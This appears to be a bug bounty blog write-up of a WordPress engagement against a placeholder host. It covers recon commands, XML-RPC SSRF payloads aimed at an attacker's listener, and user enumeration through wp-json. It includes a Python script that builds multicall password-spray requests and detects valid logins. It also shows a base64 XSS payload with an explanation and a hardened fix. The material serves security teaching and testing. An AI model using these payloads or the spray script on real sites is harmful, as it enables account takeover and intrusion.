Nitin Yadav

Unleashing the Ethical Hacker Within: Cybersecurity Insights, Bug Bounty Tips, and the Art of Penetration Testing

Hello everyone, I hope you are all doing great.

I am back with another write-up. This one covers some of my findings on a recent engagement, so let's start.



This time a project came in with a very small scope: a single URL, let's say www.victim.com.

For the first step, we gathered all the information we could.

The first thing to determine was the technology stack and the web server, for which we used Wappalyzer.




Next, let's look for the standard files that often reveal structure or policy: /robots.txt and /sitemap.xml (paths the site wants indexed or hidden), /crossdomain.xml and /clientaccesspolicy.xml (cross-origin policy for Flash and Silverlight clients), and /.well-known/ (security.txt, change-password and similar metadata).








So let's move to our next step, directory enumeration and fuzzing. For that I use a bunch of tools:


hakrawler -domain https://victim.com/

(The -domain flag is from the older hakrawler; current releases read URLs from stdin instead: echo https://victim.com/ | hakrawler)

gospider -s "https://victim.com/" -o output -c 10 -d 1

gospider -S sites.txt -o output -c 10 -d 1

gospider -s "https://victim.com/" -o output -c 10 -d 1 --other-source --include-subs

ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w OneListForAll/onelistforall.txt -u https://victim.com/FUZZ

gau victim.com | unfurl -u paths | sed 's#/#\n#g' | sort -u

gau victim.com | unfurl -u keys

gau victim.com | head -n 1000 | fff -s 200 -s 404


You can use many more.


From these I got a bunch of directories and files, so let's start the exploitation phase. We will discuss recon in more depth some other day.


From the discovered paths it was clear that the website was running WordPress, so I started to look for the vulnerabilities that are typically present in a WordPress install.


Let's discuss them one by one.


xmlrpc.php


To detect this, just visit www.victim.com/xmlrpc.php with a normal GET request. A live endpoint answers with the error message "XML-RPC server accepts POST requests only."



Let's exploit this one.


First capture the request in Burp, change the method from GET to POST, set the Content-Type header to text/xml and put the XML-RPC call in the request body.





Now list the available methods with:


<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>




If pingback.ping is in the list, perform SSRF with it. The first parameter is the "source" URL that the server will fetch (your listener), the second must be a valid post URL on the victim site with pingbacks enabled. Even when the call comes back with a fault (for example that the source does not link to the target), the request to your server has already been made, so watch your listener rather than the XML-RPC response:


<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://<YOUR SERVER >:<port></string></value></param>
    <param><value><string>http://<Some Valid Location ></string></value></param>
  </params>
</methodCall>


WP User Enumeration


On visiting www.victim.com/wp-json/wp/v2/users we were able to see the users. The "slug" field in that response is normally the actual login name, while "name" is only the display name. Note that for unauthenticated requests this endpoint only lists users who have published content; if it is blocked, www.victim.com/?author=1 redirecting to /author/<name>/ leaks the same information.




Having both xmlrpc.php and user enumeration makes the two findings worth more together than apart. wp-json hands you valid login names, so a brute-force attack no longer has to guess the username. xmlrpc.php then gives you a login oracle that does not go through wp-login.php at all: the wp.getUsersBlogs method takes a username and password and returns either the user's blog list or the fault "Incorrect username or password.", and system.multicall lets you pack many wp.getUsersBlogs calls into a single POST.


Two caveats before you report this as critical. WordPress 4.4 and later refuse the remaining logins in a multicall once one of them has failed, so the "hundreds of guesses per request" amplification only pays off against old installs; on current versions you get one real guess per request. Even then, xmlrpc.php is a second login endpoint that some rate-limiting plugins aimed only at wp-login.php do not cover, which is why the chain is still worth demonstrating.


Admin Page Bruteforce


So now we have our users, and from the content discovery we also found an admin login page.


Here we took the usernames we had obtained and tried to brute force the login, and there was no brute-force protection.
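The chain described above (usernames from wp-json, a system.multicall password spray through wp.getUsersBlogs, and recognising a successful form login on wp-login.php), written out as an added example. This is not code from the original post; it runs offline against constructed sample responses, victim.com is the write-up's placeholder host, and the user names and password list are made up for the demonstration. The post_xmlrpc() helper is what you would use to actually send the request body.

```python
"""Added example: WordPress REST user enumeration chained into an XML-RPC
multicall password spray, plus a check for a successful wp-login.php login.
Runs offline against constructed sample responses (no real data)."""
import json
import urllib.request
import xmlrpc.client

XMLRPC_URL = "https://victim.com/xmlrpc.php"  # placeholder host from the write-up

# Constructed sample of a /wp-json/wp/v2/users response.
SAMPLE_USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin"},
    {"id": 7, "name": "Jane Editor", "slug": "jane"},
])


def usernames_from_wp_json(body):
    """The 'slug' field is normally the login name; 'name' is only a display name."""
    return [u["slug"] for u in json.loads(body) if "slug" in u]


def list_methods_request():
    """Body for the system.listMethods probe shown earlier in the write-up."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()


def multicall_supported(list_methods_response):
    """True when the server advertises both methods the spray relies on."""
    (methods,), _ = xmlrpc.client.loads(list_methods_response)
    return "system.multicall" in methods and "wp.getUsersBlogs" in methods


def multicall_login_request(usernames, passwords):
    """One POST body carrying one wp.getUsersBlogs call per (user, password)
    pair, so a single HTTP request tests many credentials."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [u, p]}
             for u in usernames for p in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def valid_credentials(multicall_response, usernames, passwords):
    """Return the (user, password) pairs that authenticated.

    system.multicall answers with one array; element i matches call i in
    request order. WordPress reports a failed login as a struct with
    faultCode/faultString (403, "Incorrect username or password."); a success
    is a one-element array wrapping that user's blog list."""
    (results,), _ = xmlrpc.client.loads(multicall_response)
    pairs = [(u, p) for u in usernames for p in passwords]
    return [pair for pair, r in zip(pairs, results)
            if not (isinstance(r, dict) and "faultCode" in r)]


def post_xmlrpc(url, body, timeout=15):
    """Send a raw XML-RPC body. Not called by the offline sample run below."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def wp_login_succeeded(status, headers):
    """wp-login.php answers a correct password with a 302 to wp-admin and a
    wordpress_logged_in_* cookie; a wrong one re-renders the form with 200.
    `headers` is a list of (name, value) tuples as returned by http.client."""
    cookies = " ".join(v for k, v in headers if k.lower() == "set-cookie")
    return status == 302 and "wordpress_logged_in_" in cookies


# Constructed sample responses so the example runs offline.
SAMPLE_LIST_METHODS = xmlrpc.client.dumps(
    (["system.multicall", "system.listMethods", "pingback.ping",
      "wp.getUsersBlogs", "wp.getPosts"],), methodresponse=True).encode()

PASSWORDS = ["Winter2024!", "Password123"]  # made-up spray list
FAULT = {"faultCode": 403, "faultString": "Incorrect username or password."}
SAMPLE_MULTICALL = xmlrpc.client.dumps(([
    [[{"blogid": "1", "blogName": "victim", "url": "https://victim.com/",
       "isAdmin": True, "xmlrpc": XMLRPC_URL}]],  # admin / Winter2024! succeeded
    FAULT,                                       # admin / Password123
    FAULT,                                       # jane / Winter2024!
    FAULT,                                       # jane / Password123
],), methodresponse=True).encode()

if __name__ == "__main__":
    users = usernames_from_wp_json(SAMPLE_USERS_JSON)
    assert multicall_supported(SAMPLE_LIST_METHODS)
    body = multicall_login_request(users, PASSWORDS)  # what you would post_xmlrpc()
    print(valid_credentials(SAMPLE_MULTICALL, users, PASSWORDS))  # [('admin', 'Winter2024!')]
```

The sample multicall response puts the successful pair first on purpose: on WordPress 4.4 and later every login after the first failure in the same request is refused, so only the ordering shown here would produce a hit on a current install.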


XSS


After these, I wanted to find more assets if I could, so I turned to Google dorking. I used my own tool for this, which is now available on our website.




From this we learned that the website was using a theme called wahi, which takes a base64-encoded value. We tried XSS there with www.victim.com/wahi=JzthbGVydCgxKTsvLw== and boom. The base64 value decodes to ';alert(1);// which is a payload built to close a single-quoted JavaScript string the theme writes the decoded value into, run alert(1) and comment out whatever follows.
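Why that base64 value works, and what the fix looks like, as an added example that is not the theme's real code and not from the original post. The template layout (a theme variable assigned inside an inline script tag) is an assumption; the only thing taken from the write-up is the payload JzthbGVydCgxKTsvLw==. The check functions parse the rendered script the way a JavaScript engine and an HTML parser would treat it, so they also catch a </script> smuggled through the same parameter, which the page's payload does not use.

```python
"""Added example: a base64-decoded query value dropped into a JS string literal,
the hardened form, and checks that show the difference. Template and variable
name are assumptions; the payload comes from the write-up."""
import base64
import json

PAYLOAD_B64 = "JzthbGVydCgxKTsvLw=="  # from the write-up


def decode_param(value):
    """What the theme is assumed to do first: base64-decode the query value."""
    return base64.b64decode(value).decode("utf-8", "replace")


def encode_param(value):
    """Build a parameter value the way an attacker would."""
    return base64.b64encode(value.encode("utf-8")).decode("ascii")


def render_vulnerable(param_b64):
    """Assumed vulnerable sink: the decoded value is concatenated into a
    single-quoted JavaScript string literal with no escaping."""
    return "<script>var theme = '%s';</script>" % decode_param(param_b64)


def render_safe(param_b64):
    """Hardened sink: JSON-encode the value (escapes quotes and backslashes) and
    also escape < and > so a '</script>' inside the value cannot close the tag,
    which JSON encoding alone does not prevent."""
    encoded = json.dumps(decode_param(param_b64))
    encoded = encoded.replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>var theme = %s;</script>" % encoded


def _end_of_js_string(src, start):
    """Index just past the closing quote of the JS string literal that starts
    at src[start], honouring backslash escapes like a JS tokenizer."""
    quote = src[start]
    i = start + 1
    while i < len(src):
        if src[i] == "\\":
            i += 2
            continue
        if src[i] == quote:
            return i + 1
        i += 1
    raise ValueError("unterminated string literal")


def value_escapes_literal(rendered):
    """True when the injected value terminates the string literal and leaves
    extra JavaScript (e.g. alert(1)) outside it."""
    marker = "var theme = "
    body = rendered[rendered.index(marker) + len(marker):]
    end = _end_of_js_string(body, 0)
    return body[end:] != ";</script>"


def closes_script_tag(rendered):
    """True when the value smuggles a </script> that an HTML parser would honour
    regardless of JavaScript string syntax."""
    return rendered.lower().count("</script") > 1


if __name__ == "__main__":
    print(decode_param(PAYLOAD_B64))                              # ';alert(1);//
    print(value_escapes_literal(render_vulnerable(PAYLOAD_B64)))  # True
    print(value_escapes_literal(render_safe(PAYLOAD_B64)))        # False
```

The JSON-encoding step is the usual fix for a value in a JavaScript string context; the extra < and > escaping matters because the browser's HTML parser finds the end of the script element before the JavaScript engine ever sees the string.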



There were many other bugs, but we will talk about them in some other blog post (this one would become boring if we added more).

I hope you enjoyed this one and learned something new.


See you next time 😉



Take care, happy hacking!








